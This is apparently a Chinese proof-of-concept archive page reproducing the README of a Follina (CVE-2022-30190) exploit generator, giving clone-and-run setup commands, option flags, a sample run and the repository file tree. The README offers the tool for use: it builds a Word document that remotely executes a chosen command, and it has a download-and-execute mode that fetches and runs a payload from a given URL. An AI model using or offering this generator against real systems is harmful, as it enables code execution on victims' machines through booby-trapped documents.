关联漏洞
描述
Microsoft Support Diagnostic Tool (CVE-2022-30190)
介绍
# CVE-2022-30190 - Microsoft Support Diagnostic Tool
## About
This script will attempt to create a Microsoft Office document which will remotely execute code.
## Setup
```
git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help
```
## Options
```
usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
[--download_url DOWNLOAD_URL]
Generate CVE-2022-30190 Word documents.
optional arguments:
-h, --help show this help message and exit
--html HTML URL to online exploit HTML file
--cmd CMD Command you want to execute on run
--downexec Enable download and execute mode
--download_url DOWNLOAD_URL
Source where to download and execute from
```
## Examples
```
$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] Starting CVE-2022-30190 Generator...
[•] Created by https://github.com/joshuavanderpoll
[•] Using Word document: Original.docx
[•] Deflating Word document...
[•] Deflated Word document.
[√] Exploited Word document saved in "./builds/Exploit.docx" (1109 bytes).
[√] Exploit HTML file saved in "./builds/Exploit.html" (4241 bytes).
```
文件快照
[4.0K] /data/pocs/010e04481b83fcb265b4251f5653eb07233d2071
├── [3.9K] CVE-2022-30190.py
├── [4.0K] doc
│ ├── [1.3K] [Content_Types].xml
│ ├── [4.0K] docProps
│ │ ├── [ 704] app.xml
│ │ └── [ 735] core.xml
│ ├── [4.0K] _rels
│ └── [4.0K] word
│ ├── [3.8K] document.xml
│ ├── [1.5K] fontTable.xml
│ ├── [4.0K] _rels
│ │ └── [ 975] document.xml.rels
│ ├── [2.9K] settings.xml
│ ├── [ 29K] styles.xml
│ ├── [4.0K] theme
│ │ └── [6.6K] theme1.xml
│ └── [ 803] webSettings.xml
└── [1.3K] README.md
6 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。